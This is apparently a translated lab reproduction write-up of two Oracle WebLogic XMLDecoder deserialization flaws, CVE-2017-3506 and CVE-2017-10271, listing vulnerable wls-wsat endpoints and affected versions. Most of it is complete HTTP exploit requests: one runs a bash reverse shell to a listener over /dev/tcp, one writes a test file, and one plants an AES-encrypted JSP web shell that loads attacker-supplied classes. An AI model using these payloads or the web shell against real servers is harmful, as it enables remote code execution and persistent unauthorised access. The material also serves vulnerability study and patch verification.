Weblogic vulnerability reproduction

Weblogic Vulnerability Reappearance

Article directory

  • Weblogic vulnerability reproduction
    • WebLogic XMLDecoder Deserialization Vulnerability (CVE-2017-3506)
      • principle
      • Affected version
      • recurrent
    • Weblogic < 10.3.6 'wls-wsat' XMLDecoder deserialization vulnerability
      • principle
      • Affected version
      • recurrent

WebLogic XMLDecoder deserialization vulnerability (CVE-2017-3506)

Principle

It was revealed on the Internet that the WLS component of weblogic has an xmldecoder deserialization vulnerability, and the xml data package constructed by posting directly can be rce.

Affects version

10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0.

Recurrence

There may be a vulnerability path
/wls-wsat/CoordinatorPortType, /wls-wsat/RegistrationPortTypeRPC,
/wls-wsat/ParticipantPortType, /wls-wsat/RegistrationRequesterPortType,
/wls-wsat/CoordinatorPortType11, /wls-wsat/RegistrationPortTypeRPC11,
/wls-wsat/ParticipantPortType11, /wls-wsat/RegistrationRequesterPortType11

Visit http://192.168.190.136:7001/wls-wsat/RegistrationRequesterPortType , and the response shows that Web Services proves the existence of the vulnerability.

image.png

Execute reverse shell command

POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
Host: 192.168.190.136:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml + xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: text/xml
Content-Length: 841

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
          <java>
            <object class="java. lang. ProcessBuilder">
              <array class="java. lang. String" length="3">
                <void index="0">
                  <string>/bin/bash</string>
                </void>
<void index="1">
                  <string>-c</string>
                </void>
<void index="2">
                  <string>bash -i &gt; &amp; /dev/tcp/192.168.190.1/44440 &gt; &amp;1</string>
                </void>
              </array>
              <void method="start"/>
            </object>
          </java>
        </work:WorkContext>
      </soapenv:Header>
      <soapenv:Body/>
    </soapenv:Envelope>

image.png

nc listens on port 4444 to receive bash shell

image.png

Weblogic < 10.3.6 'wls-wsat' XMLDecoder deserialization vulnerability

Principle

CVE-2017-10271 is a patch bypass for CVE-2017-3506, replacing object with void.

Affects version

10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0.

Recurrence

Visit http://192.168.0.131:7001/wls-wsat/CoordinatorPortType and respond with Web Services to prove the existence of the vulnerability

image-20230516095055547

Use the POST method to send specific xml data to implement various command execution.
Try to write to the file
Request Packet

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.0.131:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml + xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: text/xml
Content-Length: 705

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
        <soapenv:Header>
            <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
                <java version="1.6.0" class="java.beans.XMLDecoder">
                    <void class="java.io.PrintWriter">
                        <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.txt</string><void method="println">
                        <string>xmldecoder_vul_test11</string></void><void method="close"/>
                    </void>
                </java>
            </work:WorkContext>
        </soapenv:Header>
        <soapenv:Body/>
    </soapenv:Envelope>

Return 500, successful execution

image-20230516095549110

image-20230516095642654

Write shell

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.190.131:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml + xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: text/xml
Content-Length: 1154

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
     <soapenv:Header>
     <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
     <java><java version="1.4.0" class="java.beans.XMLDecoder">
     <void class="java.io.PrintWriter">
     <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/zy.jsp</string>
     <void method="println"><string>
     <![CDATA[
  <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c); }public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="b8a7336f1f7528e1";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(), "AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine())) ).newInstance().equals(pageContext);}%>
     ]]>
     </string>
     </void>
     <void method="close"/>
     </void></java></java>
     </work:WorkContext>
     </soapenv:Header>
     <soapenv:Body/>
</soapenv:Envelope>

image-20230516095804022